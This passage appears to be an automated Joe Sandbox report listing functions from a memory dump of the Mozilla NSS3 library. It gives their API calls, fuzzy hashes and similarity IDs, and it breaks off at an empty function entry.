Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: a62226b7735f4bb1906917b32378a53ce7967982476583fef9c3912692285998
Instruction ID: ff311c766a45a41039bfddfc2224d377d45c99116cb8769b6a0ce7d3eab3fdf1
Opcode Fuzzy Hash: a62226b7735f4bb1906917b32378a53ce7967982476583fef9c3912692285998
Instruction Fuzzy Hash: 9301F7B5E2012067FA106F749C17B0777A89B2125CF480074DC0A9D112F76EDA25C2A7

Uniqueness

Uniqueness Score: -1.00%

Function 6BC4AB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6BC4A6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6BC480C1), ref: 6BC4A6F9
Part of subcall function 6BC4A6D0: memcpy.VCRUNTIME140(00000210,6BD10BEC,0000011C), ref: 6BC4A869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6BC480AD), ref: 6BC4AB48

Part of subcall function 6BC0FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BC08D2D,?,00000000,?), ref: 6BC0FB85
Part of subcall function 6BC0FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BC0FBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6BC480AD), ref: 6BC4AB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6BC480AD), ref: 6BC4ABA7
memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6BC480AD), ref: 6BC4ABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6BC480AD), ref: 6BC4AC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6BC480AD), ref: 6BC4AC48

Part of subcall function 6BC45BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6BC480E3,00000000), ref: 6BC45BD6
Part of subcall function 6BC45BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6BC480E3,00000000), ref: 6BC45BED
Part of subcall function 6BC45BC0: PR_EnterMonitor.NSS3(07890478,?,?,6BC480E3,00000000), ref: 6BC45C04
Part of subcall function 6BC45BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6BC480E3,00000000), ref: 6BC45C1B
Part of subcall function 6BC45BC0: PR_Unlock.NSS3(0140BCE8,?,?,6BC480E3,00000000), ref: 6BC45C4C
Part of subcall function 6BC45BC0: PR_Unlock.NSS3(08C48300,?,?,6BC480E3,00000000), ref: 6BC45C5F
Part of subcall function 6BC45BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6BC480E3,00000000), ref: 6BC45C76
Part of subcall function 6BC45BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6BC480E3,00000000), ref: 6BC45C8D
Part of subcall function 6BC45BC0: PR_ExitMonitor.NSS3(07890478,?,?,6BC480E3,00000000), ref: 6BC45CA4
Part of subcall function 6BC45BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6BC480E3,00000000), ref: 6BC45CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC480AD), ref: 6BC4ACED

Part of subcall function 6BC10D30: calloc.MOZGLUE ref: 6BC10D50
Part of subcall function 6BC10D30: TlsGetValue.KERNEL32 ref: 6BC10D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC480AD), ref: 6BC4AD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6BC4AEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6BC4AEFC

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: 89dc59e5dbe0fd964ef89103123245aa3857afe244a3597d43e927beeeecfc6b
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: B2D1EAB5A112028FDB44CF68C481BA5B7E5BF48314F0842B9EC1DDF346E774AA94CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBBB90 Relevance: 15.2, APIs: 10, Instructions: 187memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBD06A0: TlsGetValue.KERNEL32 ref: 6BBD06C2
Part of subcall function 6BBD06A0: EnterCriticalSection.KERNEL32(?), ref: 6BBD06D6
Part of subcall function 6BBD06A0: PR_Unlock.NSS3 ref: 6BBD06EB

PORT_NewArena_Util.NSS3(00001000), ref: 6BBBBC24
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6BBBBC39
PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6BBBBC58
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6BBBBCBE
CERT_DestroyCertificate.NSS3(?), ref: 6BBBBCDA
PR_SetError.NSS3(FFFFE00D,00000000), ref: 6BBBBD04
CERT_DestroyCertificate.NSS3(?), ref: 6BBBBD13
CERT_DestroyCertificate.NSS3(00000000), ref: 6BBBBD35
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BBBBD58
CERT_DestroyCertificate.NSS3(?), ref: 6BBBBD88

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$CertificateDestroy$Alloc_ArenaArena_$CopyCriticalEnterErrorFreeItem_SectionUnlockValue
String ID:
API String ID: 401161163-0
Opcode ID: 5cf35931e6b960d5063dc9ac17be50ff7b59b8925f6270db0474a0eaac0d4718
Instruction ID: 435b58394a6eec0e36dd51fe2374205a1c495ea9c33720ce46f7ae0b700cc78a
Opcode Fuzzy Hash: 5cf35931e6b960d5063dc9ac17be50ff7b59b8925f6270db0474a0eaac0d4718
Instruction Fuzzy Hash: 7E517BB5E003459BEB10CF79DCC2AAEB7B5EF88208F048468E815A7251FF78E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BBF4A20 Relevance: 15.2, APIs: 10, Instructions: 182COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?), ref: 6BBF4A4B
PK11_GetInternalSlot.NSS3 ref: 6BBF4A59
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6BBF4AC6
TlsGetValue.KERNEL32 ref: 6BBF4B17
EnterCriticalSection.KERNEL32(?), ref: 6BBF4B2B
PR_Unlock.NSS3(?), ref: 6BBF4B77
PK11_FreeSymKey.NSS3(?), ref: 6BBF4B87
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6BBF4B9A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BBF4BA9
PR_SetError.NSS3(00000000,00000000), ref: 6BBF4BC1

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$K11_$DestroyPrivatecalloc$CriticalDoesEnterErrorFreeInternalItem_MechanismSectionSlotUnlockUtilZfree
String ID:
API String ID: 3936029921-0
Opcode ID: fc05551c7d355234a1c15d7b034b8d50d4c4ed82b34039a6e21ed5a0d68d5b19
Instruction ID: 17754e89e50b31d4a966ae863550ee67fb69e7d4ab09f5d2785db3795fba7717
Opcode Fuzzy Hash: fc05551c7d355234a1c15d7b034b8d50d4c4ed82b34039a6e21ed5a0d68d5b19
Instruction Fuzzy Hash: 52516EB5E002599BDB00CF69D941AAFB7B9EF48354F044069E805A7301EB39ED16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC54A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6BC4AEC0,00000A20,00000000), ref: 6BC54A8B

Part of subcall function 6BC10D30: calloc.MOZGLUE ref: 6BC10D50
Part of subcall function 6BC10D30: TlsGetValue.KERNEL32 ref: 6BC10D6D

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6BC54AAA

Part of subcall function 6BC0FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BC08D2D,?,00000000,?), ref: 6BC0FB85
Part of subcall function 6BC0FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BC0FBB1

PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6BC54ABD

Part of subcall function 6BC10F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6BBB2AF5,?,?,?,?,?,6BBB0A1B,00000000), ref: 6BC10F1A
Part of subcall function 6BC10F10: malloc.MOZGLUE(00000001), ref: 6BC10F30
Part of subcall function 6BC10F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BC10F42

SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6BC54AD6
SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6BC54AEC

Part of subcall function 6BC0FB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6BC08D2D,?,00000000,?), ref: 6BC0FB9B

SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6BC54B49
SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6BC54B58
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6BC54B64
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC54B74
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC54B7E

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
String ID:
API String ID: 476651045-0
Opcode ID: 704b6d05d0831f11b98af9698dd4d753797af14aaec850f0ea31f0ae2be87a91
Instruction ID: 6f0bb852ccbc9591b06fb229d2e5ae906b9164b80c47bc42e79becd76839e4da
Opcode Fuzzy Hash: 704b6d05d0831f11b98af9698dd4d753797af14aaec850f0ea31f0ae2be87a91
Instruction Fuzzy Hash: CA31B5B69116019FD714CF35DC41A577BF8EF18248F044469EC4AC7206F735E625CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD89C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6BBDAE9B,00000000,?,?), ref: 6BBD89DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6BBB2D6B,?,?,00000000), ref: 6BBD89EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6BBB2D6B), ref: 6BBD8A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6BBB2D6B,?), ref: 6BBD8A11

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: a299a92a02f461a4d83e9e2b8e55d756e588790608b719ca324063ff1831edc2
Instruction ID: 307c569d5d8ce855c6ed9170cd1184eeda71611fda4c778eb55fc6b9a71f86c5
Opcode Fuzzy Hash: a299a92a02f461a4d83e9e2b8e55d756e588790608b719ca324063ff1831edc2
Instruction Fuzzy Hash: 6A1124F2A402846AFB004B747C82B7F7658DB4079EF084175ED099A242F72EC924D2B2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC45BC0 Relevance: 15.1, APIs: 10, Instructions: 83COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(8B105D8B,?,?,6BC480E3,00000000), ref: 6BC45BD6

Part of subcall function 6BC79090: TlsGetValue.KERNEL32 ref: 6BC790AB
Part of subcall function 6BC79090: TlsGetValue.KERNEL32 ref: 6BC790C9
Part of subcall function 6BC79090: EnterCriticalSection.KERNEL32 ref: 6BC790E5
Part of subcall function 6BC79090: TlsGetValue.KERNEL32 ref: 6BC79116
Part of subcall function 6BC79090: LeaveCriticalSection.KERNEL32 ref: 6BC7913F

PR_EnterMonitor.NSS3(840FC085,?,?,6BC480E3,00000000), ref: 6BC45BED
PR_EnterMonitor.NSS3(07890478,?,?,6BC480E3,00000000), ref: 6BC45C04
PR_EnterMonitor.NSS3(000000F4,?,?,6BC480E3,00000000), ref: 6BC45C1B
PR_Unlock.NSS3(0140BCE8,?,?,6BC480E3,00000000), ref: 6BC45C4C
PR_Unlock.NSS3(08C48300,?,?,6BC480E3,00000000), ref: 6BC45C5F
PR_ExitMonitor.NSS3(8B105D8B,?,?,6BC480E3,00000000), ref: 6BC45C76
PR_ExitMonitor.NSS3(840FC085,?,?,6BC480E3,00000000), ref: 6BC45C8D
PR_ExitMonitor.NSS3(07890478,?,?,6BC480E3,00000000), ref: 6BC45CA4
PR_ExitMonitor.NSS3(000000F4,?,?,6BC480E3,00000000), ref: 6BC45CBB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Monitor$Enter$Exit$Value$CriticalSectionUnlock$Leave
String ID:
API String ID: 3915314664-0
Opcode ID: c390da7ee32e8ed79f89aea9f0192ba1c6bdf73301143e97ba10d1fedbefe6ac
Instruction ID: 713231ff91f41163c2d2c367eb24f6f7e1b2ebfebd98189e1f22d6f130787fc9
Opcode Fuzzy Hash: c390da7ee32e8ed79f89aea9f0192ba1c6bdf73301143e97ba10d1fedbefe6ac
Instruction Fuzzy Hash: 102132B1A306106FDA319B34EC03ACBB7B1AB15208F444834D59A86221F73EF729C746

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE2BF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismInfo), ref: 6BBE2C0C
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6BBE2C27

Part of subcall function 6BCC09D0: PR_Now.NSS3 ref: 6BCC0A22
Part of subcall function 6BCC09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BCC0A35
Part of subcall function 6BCC09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BCC0A66
Part of subcall function 6BCC09D0: PR_GetCurrentThread.NSS3 ref: 6BCC0A70
Part of subcall function 6BCC09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BCC0A9D
Part of subcall function 6BCC09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BCC0AC8
Part of subcall function 6BCC09D0: PR_vsmprintf.NSS3(?,?), ref: 6BCC0AE8
Part of subcall function 6BCC09D0: EnterCriticalSection.KERNEL32(?), ref: 6BCC0B19
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BCC0B48
Part of subcall function 6BCC09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BCC0C76
Part of subcall function 6BCC09D0: PR_LogFlush.NSS3 ref: 6BCC0C7E

PR_LogPrint.NSS3( type = 0x%x,?), ref: 6BBE2C40

Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(?), ref: 6BCC0B88
Part of subcall function 6BCC09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6BCC0C5D
Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BCC0C8D
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0C9C
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(?), ref: 6BCC0CD1
Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BCC0CEC
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0CFB
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BCC0D16
Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BCC0D26
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0D35
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6BCC0D65
Part of subcall function 6BCC09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BCC0D70
Part of subcall function 6BCC09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BCC0D90
Part of subcall function 6BCC09D0: free.MOZGLUE(00000000), ref: 6BCC0D99

PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6BBE2C59

Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BCC0BAB
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0BBA
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0D7E

Strings

C_GetMechanismInfo, xrefs: 6BBE2C07
type = 0x%x, xrefs: 6BBE2C3B
pInfo = 0x%p, xrefs: 6BBE2C54
slotID = 0x%x, xrefs: 6BBE2C22

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: DebugOutputStringfflush$Printfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: pInfo = 0x%p$ slotID = 0x%x$ type = 0x%x$C_GetMechanismInfo
API String ID: 2688868551-112346095
Opcode ID: 4b8da9c08863ff0b5c262c5336d28e843a5c3d18bec2779286453f7fed4af863
Instruction ID: 6d3c23242e0caacdba74e2c0589531bc52eecd34a127d17ca0a6a452795f46e1
Opcode Fuzzy Hash: 4b8da9c08863ff0b5c262c5336d28e843a5c3d18bec2779286453f7fed4af863
Instruction Fuzzy Hash: CC21EB75500141AFEB00DB64DD86B09BB65EB4339EF484065E9089B321EB79C947CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB8980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6BBB7310), ref: 6BBB89B8

Part of subcall function 6BC11200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6BBB88A4,00000000,00000000), ref: 6BC11228
Part of subcall function 6BC11200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6BC11238
Part of subcall function 6BC11200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6BBB88A4,00000000,00000000), ref: 6BC1124B
Part of subcall function 6BC11200: PR_CallOnce.NSS3(6BD12AA4,6BC112D0,00000000,00000000,00000000,?,6BBB88A4,00000000,00000000), ref: 6BC1125D
Part of subcall function 6BC11200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6BC1126F
Part of subcall function 6BC11200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6BC11280
Part of subcall function 6BC11200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6BC1128E
Part of subcall function 6BC11200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6BC1129A
Part of subcall function 6BC11200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6BC112A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6BBB7310), ref: 6BBB89E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6BBB8A00
CERT_CopyRDN.NSS3(00000004,00000000,6BBB7310,?,?,00000004,?), ref: 6BBB8A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6BBB8A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6BBB7310), ref: 6BBB8AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6BBB7310), ref: 6BBB8AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6BBB7310), ref: 6BBB8B1D

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: 02858a6fb51d120b5f8533d5c771f7bda77c632629626617c134457d7e07aae4
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: 3851E671A00251AFE7108F24CC41B7E77A8EF42758F058298EC19AF391EB7DE905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBA69A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

